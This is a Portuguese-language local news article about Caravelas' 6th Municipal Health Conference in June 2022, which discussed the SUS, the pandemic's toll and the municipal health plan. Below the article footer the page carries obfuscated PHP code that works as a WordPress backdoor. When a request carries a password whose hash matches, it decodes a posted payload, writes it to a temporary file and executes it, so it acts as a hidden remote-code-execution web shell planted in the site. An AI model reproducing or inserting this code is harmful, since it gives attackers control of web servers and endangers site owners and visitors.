• SEJA BEM-VINDO

Caravelas realizou a 6ª Conferência Municipal de Saúde

Publicado em: 25/06/2022 Atualizado:: junho 25, 2022

 

A 6ª Conferência Municipal de Saúde foi realizada no auditório do Colégio Polivalente de Caravelas nesta quarta-feira (22), com a organização do Conselho Municipal de Saúde e da Secretaria Municipal de Saúde. O objetivo é elaborar o Plano Municipal de Saúde para o triênio 2022-2025.

 

Em pauta, estava a importância do Sistema Único de Saúde (SUS), sobretudo, com a demanda da pandemia, período em que se perdeu grande número de vidas humanas, com o colapso – da saúde pública e particular – demonstrando a covid-19 foi a situação mais grave enfrentada pelo sistema de saúde brasileiro, dada a gravidade da infecção, a velocidade da transmissão do vírus, a falta de estrutura para atender grande quantidade de pessoas afetadas, ampliadas pela falta de informações, de medicamentos e de vacinas, dentre outros agravantes.

 

 

 

O pós-pandemia não está muito distante dos dias mais difíceis, com a reinfecção, com pacientes sequelados e com a necessidade de adoção de medidas para superar crises sanitárias, com ações da saúde, da economia, da educação e de várias outras pautas.

 

Foi justamente esses os temas principais discutidos no planejamento das ações de saúde no contexto social e político brasileiro, dando oportunidade aos gestores, trabalhadores da saúde e a comunidade discutir e planejarem as ações para o futuro do sistema de saúde do município.

 

A proposta do evento foi avaliar o enfrentamento das dificuldades e da superação de desafios, visando ampliar a importância do SUS e a necessidade de fortalecimento da rede de atendimento para garantir a vida e a saúde dos brasileiros.

 

 

 

Na prática, a conferência é a ferramenta utilizada para avaliar as ações do SUS de Caravelas e elaborar as diretrizes do Plano Plurianual (PPA) do município, com participação e controle social.

 

De acordo com a Secretária de Saúde de Caravelas, Marina Ramalho, “essa é a primeira conferência municipal de saúde realizada pós-pandemia, por isso, é maior a responsabilidade de debater a saúde, à medida que é necessário buscar o fortalecimento da estrutura pública e dos serviços oferecidos à população, capazes de garantir a saúde e a qualidade de vida à população”, disse.

 

 

 

 

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}